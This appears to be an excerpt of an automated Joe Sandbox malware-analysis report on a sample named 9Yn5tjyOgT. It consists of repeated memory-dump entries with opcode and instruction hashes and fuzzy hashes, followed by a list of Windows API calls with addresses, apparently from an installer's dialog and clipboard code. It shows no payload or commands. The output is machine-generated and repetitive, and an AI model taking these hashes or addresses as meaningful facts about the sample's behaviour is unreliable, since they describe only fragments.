                                                                                                                    • Instruction ID: 439a483d388457ff7ae41584d53c560188f547aed7c878b66c18f78341e916a6
                                                                                                                    • Opcode Fuzzy Hash: 81735143db61ecf270544090e874db3e906615efc5577c5d3215f145034e79c7
                                                                                                                    • Instruction Fuzzy Hash: FBC1AF74E01258CFEB54DFA5C994B9DBBB2BF89300F2080A9D409AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cd1c166091e693554fe6f6f32552015b224580b11404abf2686ec8f491ce1a0e
                                                                                                                    • Instruction ID: ebb0a98fecabfdf776d486f51d9a4b7dad42e16d5f461217a5fc1dda70f5cb95
                                                                                                                    • Opcode Fuzzy Hash: cd1c166091e693554fe6f6f32552015b224580b11404abf2686ec8f491ce1a0e
                                                                                                                    • Instruction Fuzzy Hash: 29C1AD74E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f949c7d0fbfe26f26ecff949a7282a7cdfabf850318e2a90ba1a5e329fc286fb
                                                                                                                    • Instruction ID: 011f7a886ca4994bcc372c084da523cd81abda63ebbb402812382bc9b1da676b
                                                                                                                    • Opcode Fuzzy Hash: f949c7d0fbfe26f26ecff949a7282a7cdfabf850318e2a90ba1a5e329fc286fb
                                                                                                                    • Instruction Fuzzy Hash: 05C1A174E01258CFEB14DFA9C994B9DBBB2BF89300F2081A9D809AB355DB355E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ce2d68890d0499b95eb770c8266d28b4869989ad4c924c6c09ff0dfb50d827fd
                                                                                                                    • Instruction ID: 5be6900d1209ef87f1f417f11b76b56256fe0b3df1f108a4300867183feb54f4
                                                                                                                    • Opcode Fuzzy Hash: ce2d68890d0499b95eb770c8266d28b4869989ad4c924c6c09ff0dfb50d827fd
                                                                                                                    • Instruction Fuzzy Hash: 57C1C074E00258CFEB14DFA5C994B9DBBB2BF89300F2080A9D809AB355DB349E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9c2d32f240b714e08af8f1bd3f631a6c530136b4e08ff75550790d59c6e80ee6
                                                                                                                    • Instruction ID: 4e1b447fbe29b11e755e393ad57086ae8583807e0e9c4ac2b5d48ad38d28e8a9
                                                                                                                    • Opcode Fuzzy Hash: 9c2d32f240b714e08af8f1bd3f631a6c530136b4e08ff75550790d59c6e80ee6
                                                                                                                    • Instruction Fuzzy Hash: C5C1BE74E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c68ffa17ed2bb60c1660c01e524cf242f27ee9556bc31257763949010d5e50d3
                                                                                                                    • Instruction ID: 7c7c98939bd7d9fb538f1ba45a81023a752dc50031d8a80be4aaf33d1a1a7866
                                                                                                                    • Opcode Fuzzy Hash: c68ffa17ed2bb60c1660c01e524cf242f27ee9556bc31257763949010d5e50d3
                                                                                                                    • Instruction Fuzzy Hash: 97C1A074E01258CFEB54DFA9C994B9DBBB2BF89300F2080A9D409AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: eb9e283a5e5e6b6727c8405270730c5e7b822cd819b04cbc4e8725ec682391b8
                                                                                                                    • Instruction ID: 6f8705c08d16acbce42feb59648404ef93b0f3f2512ba9d2f793c256d89f9450
                                                                                                                    • Opcode Fuzzy Hash: eb9e283a5e5e6b6727c8405270730c5e7b822cd819b04cbc4e8725ec682391b8
                                                                                                                    • Instruction Fuzzy Hash: 82C1BF74E01258CFEB14DFA5C994B9DBBB2BF89301F2081A9D809AB355DB349E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9ca2ec9798c240c7428282c833fc0c33c422e53ffd5c9a068a0accfbb6b26134
                                                                                                                    • Instruction ID: 1d65f8fb370c717df2bbcd4ed35b0b9d0d5b25cb206eb9d5a2a477b1907bb1f9
                                                                                                                    • Opcode Fuzzy Hash: 9ca2ec9798c240c7428282c833fc0c33c422e53ffd5c9a068a0accfbb6b26134
                                                                                                                    • Instruction Fuzzy Hash: 27C1A074E01258CFEB54DFA9C994B9DBBB2BF89300F2080A9D409AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 455c8fe0a526a1cf9a5c6f3ec4c79dba97863588db7eec2d02fe878c6816d660
                                                                                                                    • Instruction ID: 869f7e84506aa4c9c3ca0193f006d23598508d8f8815a8bdb9e2956bb11bed55
                                                                                                                    • Opcode Fuzzy Hash: 455c8fe0a526a1cf9a5c6f3ec4c79dba97863588db7eec2d02fe878c6816d660
                                                                                                                    • Instruction Fuzzy Hash: 10C1BF74E01258CFEB14DFA5C994B9DBBB2BF89300F2080A9D409AB355DB359E86CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ff6227526692ea5eb786fa9e25823b0ed07ffcb49a638f92f1091784d6302504
                                                                                                                    • Instruction ID: 9889019ba014113f1268695638bd0d7ff976c9c79eabcd9d41b8b1fafb3c45fc
                                                                                                                    • Opcode Fuzzy Hash: ff6227526692ea5eb786fa9e25823b0ed07ffcb49a638f92f1091784d6302504
                                                                                                                    • Instruction Fuzzy Hash: 1BC1B074E01258CFEB14DFA5C994B9DBBB2BF89300F2080A9D809AB355DB345E86CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 340b87e138b02f874970bb07dda27b68c452b2601623bf9800371970739d8727
                                                                                                                    • Instruction ID: 451760072ee98d8cef8045d14b732d1e92a17c819ead98ff8fe9948fbc541317
                                                                                                                    • Opcode Fuzzy Hash: 340b87e138b02f874970bb07dda27b68c452b2601623bf9800371970739d8727
                                                                                                                    • Instruction Fuzzy Hash: E0C1BE74E01258CFEB14DFA5C994B9DBBB2BF89300F2080A9D809AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bdda158d21c250ef1c155be0062203887a59ca70e99966bbb76a802fc38bcf08
                                                                                                                    • Instruction ID: ea0246a14c66340f25f4419920a45e9586dd02c914e8411e4d7a4a8cd151c698
                                                                                                                    • Opcode Fuzzy Hash: bdda158d21c250ef1c155be0062203887a59ca70e99966bbb76a802fc38bcf08
                                                                                                                    • Instruction Fuzzy Hash: C7C1AF74E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: be680bd9dfba27f22532673aea9ab4162938783d3f47e28ed8a35a66aa114d71
                                                                                                                    • Instruction ID: c210a0e5c1289004b3488fc36f0dbfc582c0395c3228bbb12b0471fb6280de1e
                                                                                                                    • Opcode Fuzzy Hash: be680bd9dfba27f22532673aea9ab4162938783d3f47e28ed8a35a66aa114d71
                                                                                                                    • Instruction Fuzzy Hash: 57C1AF74E01258CFEB54DFA9C994B9DBBB2BF89300F2080A9D409AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f511f5515e7b6d64babb1e94141a57e2208fddb6a73bb4bb2666e7616f79ff0e
                                                                                                                    • Instruction ID: a430f6231793b06b9c3cd98c64492a58fb1964ed1b635956e8c8f49e66f07753
                                                                                                                    • Opcode Fuzzy Hash: f511f5515e7b6d64babb1e94141a57e2208fddb6a73bb4bb2666e7616f79ff0e
                                                                                                                    • Instruction Fuzzy Hash: F3C1AF74E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cd919f57670eac06b06ef746957c374712f6151fb7f9e4343cb73e6a6564eaf7
                                                                                                                    • Instruction ID: b648f02680cc4cfd53df23cc1a251bc025c194ad9f3b369a0574573cfeb0f937
                                                                                                                    • Opcode Fuzzy Hash: cd919f57670eac06b06ef746957c374712f6151fb7f9e4343cb73e6a6564eaf7
                                                                                                                    • Instruction Fuzzy Hash: 6CC1A074E01258CFEB54DFA9C994B9DBBB2BF89300F2080A9D409AB355DB355E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b45f8bf1ac0c46d9e335103d430da3e333f4cd71199c66c1d74f734d1854bb13
                                                                                                                    • Instruction ID: caa01bb134b4d3f4ae97fd8a6b99390fcee4b6a72561f7df497df6454a7d00d9
                                                                                                                    • Opcode Fuzzy Hash: b45f8bf1ac0c46d9e335103d430da3e333f4cd71199c66c1d74f734d1854bb13
                                                                                                                    • Instruction Fuzzy Hash: 42C1AF74E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b37dbec86577b11c0ba93eb3577ebcae50a25a160fe2432196ba2fbd683a48fb
                                                                                                                    • Instruction ID: 75e4aa4f918dfdf1609ba7d05cf9ebcad16ffc06e2a9f624a5148f028d05c277
                                                                                                                    • Opcode Fuzzy Hash: b37dbec86577b11c0ba93eb3577ebcae50a25a160fe2432196ba2fbd683a48fb
                                                                                                                    • Instruction Fuzzy Hash: 75C1BE74E01258CFEB14DFA5C994B9DBBB2BF89301F2080A9D809AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ccf5c00a39de13675709fb3a01efa2fb571ebc1d4e19e23da416b56ae5b1f7f2
                                                                                                                    • Instruction ID: 47f4bae063fc5343258e2f266d4ec6201e4edde788efc00e63aeda7ac0a42570
                                                                                                                    • Opcode Fuzzy Hash: ccf5c00a39de13675709fb3a01efa2fb571ebc1d4e19e23da416b56ae5b1f7f2
                                                                                                                    • Instruction Fuzzy Hash: 8CC1BF74E01258CFEB14DFA5C994B9DBBB2BF89300F2080A9D809AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f0b971d56e88077ae56fea3e74b2316516657c3beb2441c39f091dcac8b3a67f
                                                                                                                    • Instruction ID: 8329856425075fd78b42062459f1e7259a292eb415f89962f3cb3b69ba6d9dfd
                                                                                                                    • Opcode Fuzzy Hash: f0b971d56e88077ae56fea3e74b2316516657c3beb2441c39f091dcac8b3a67f
                                                                                                                    • Instruction Fuzzy Hash: 40C1AE74E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1a3fc4fbb9daa0b90eb0c3ed5a8456b7cd7104eca87e40a197822e0adf79e56d
                                                                                                                    • Instruction ID: c8d39a585cb2c2984d4e03c1b16d5452445fcc97d2f0967da8278315b37ed606
                                                                                                                    • Opcode Fuzzy Hash: 1a3fc4fbb9daa0b90eb0c3ed5a8456b7cd7104eca87e40a197822e0adf79e56d
                                                                                                                    • Instruction Fuzzy Hash: ADC1BE74E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 316f3963fd18249f5a026032c65a4c19f6bb450348e96c2242cd8fbd40af1ece
                                                                                                                    • Instruction ID: 94cc132fd77fc87c6bdf9e269f0d2190b09a0622e979218b4dc007f6895eca0e
                                                                                                                    • Opcode Fuzzy Hash: 316f3963fd18249f5a026032c65a4c19f6bb450348e96c2242cd8fbd40af1ece
                                                                                                                    • Instruction Fuzzy Hash: 72C1A074E01258CFEB14DFA5C994B9DBBB2BF89300F2080A9D409AB355DB359E86CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f820238f64c50ac9669594c00597b3c715c444a4094dca5d67959f79363d7419
                                                                                                                    • Instruction ID: 2152694d940c0efd6fe3ae8e00b1a2f3f1c2a74ff60c9b18615157b8cd7c9c0f
                                                                                                                    • Opcode Fuzzy Hash: f820238f64c50ac9669594c00597b3c715c444a4094dca5d67959f79363d7419
                                                                                                                    • Instruction Fuzzy Hash: 5FC19D74E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b220f7cea917844a58f194708833c0c6294e6cfa1020e4ff9d3b9f8973f4e27d
                                                                                                                    • Instruction ID: 357dfbce1986cbfcf688484bf6e1726ce1a22d1b5bfb6a536f9ffac3a1a64761
                                                                                                                    • Opcode Fuzzy Hash: b220f7cea917844a58f194708833c0c6294e6cfa1020e4ff9d3b9f8973f4e27d
                                                                                                                    • Instruction Fuzzy Hash: 19C1AF74E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3432402753.0000000036B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_36b80000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f20a284510b0231d1369b84cb7c834d87dc0181a2b87d454a0ebaa04710f29a7
                                                                                                                    • Instruction ID: a380509eb40b1f7cfa396e0dcc463673c7c518397f122aa865b3eeb9acbb0145
                                                                                                                    • Opcode Fuzzy Hash: f20a284510b0231d1369b84cb7c834d87dc0181a2b87d454a0ebaa04710f29a7
                                                                                                                    • Instruction Fuzzy Hash: 2DC1B074E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D409AB355DB349E86CF51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3432402753.0000000036B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_36b80000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0343cfd6200a9df932b6a9f90fafca220707360718ca78e9c454a58156692569
                                                                                                                    • Instruction ID: 47cf1885ab7e95d31270002d11735b9286a16c20874e3e640f110d9b5d71e0a7
                                                                                                                    • Opcode Fuzzy Hash: 0343cfd6200a9df932b6a9f90fafca220707360718ca78e9c454a58156692569
                                                                                                                    • Instruction Fuzzy Hash: 7FC1A074E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3432402753.0000000036B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_36b80000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7635d98bf8a22871c1753b2db19569bc369557d9d5ddc306e7b278b5b72f9f1f
                                                                                                                    • Instruction ID: 08d4b718f03600048f602ae9c949d1f4d478754ab372c7972ad13132bcc9e101
                                                                                                                    • Opcode Fuzzy Hash: 7635d98bf8a22871c1753b2db19569bc369557d9d5ddc306e7b278b5b72f9f1f
                                                                                                                    • Instruction Fuzzy Hash: E4C1AF74E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D819AB355DB359E85CF10
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7e3cd5cb67966da6343999be41c1ef75994660b839dc1bf8c55e0372cbdbad43
                                                                                                                    • Instruction ID: 0834c9b6260a80c1cb6e7f00d7b936f09b4a6856aafe6aba7ff46ed288e3197c
                                                                                                                    • Opcode Fuzzy Hash: 7e3cd5cb67966da6343999be41c1ef75994660b839dc1bf8c55e0372cbdbad43
                                                                                                                    • Instruction Fuzzy Hash: 3CA19A74A05268CFDB64DF24C894B9ABBB2BF4A301F1085EAD50DA7250DB359EC1CF51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b80beb82f2b2e5496fe8367a6c01fb0fa65df0b96de380f6f3f1cf23f7f57e7e
                                                                                                                    • Instruction ID: 26c6561ac1c1fadd302dbd26538bf2456c17e29360ad50fc86a17595b553c9f9
                                                                                                                    • Opcode Fuzzy Hash: b80beb82f2b2e5496fe8367a6c01fb0fa65df0b96de380f6f3f1cf23f7f57e7e
                                                                                                                    • Instruction Fuzzy Hash: A3518E74A05268CFCB64DF24C954B9EB7B2BF4A301F5085EAD50AA7350DB359E81CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5146c5e0394ddd089741a347f74a2ee66e77c51f631b792725ea6ae00872280b
                                                                                                                    • Instruction ID: 379efd2aa43574e115b70f2479bafbf59e0d5b6f25157f358ce4cf5fa6709f3a
                                                                                                                    • Opcode Fuzzy Hash: 5146c5e0394ddd089741a347f74a2ee66e77c51f631b792725ea6ae00872280b
                                                                                                                    • Instruction Fuzzy Hash: 4FD06774D54218CACB11DF68DC546ECB770BB9A300F0124958148A7200D7719A94CE56
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                      • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                                    • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                                    • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                                    • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                                    • EmptyClipboard.USER32 ref: 004058B7
                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                                    • CloseClipboard.USER32 ref: 00405912
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
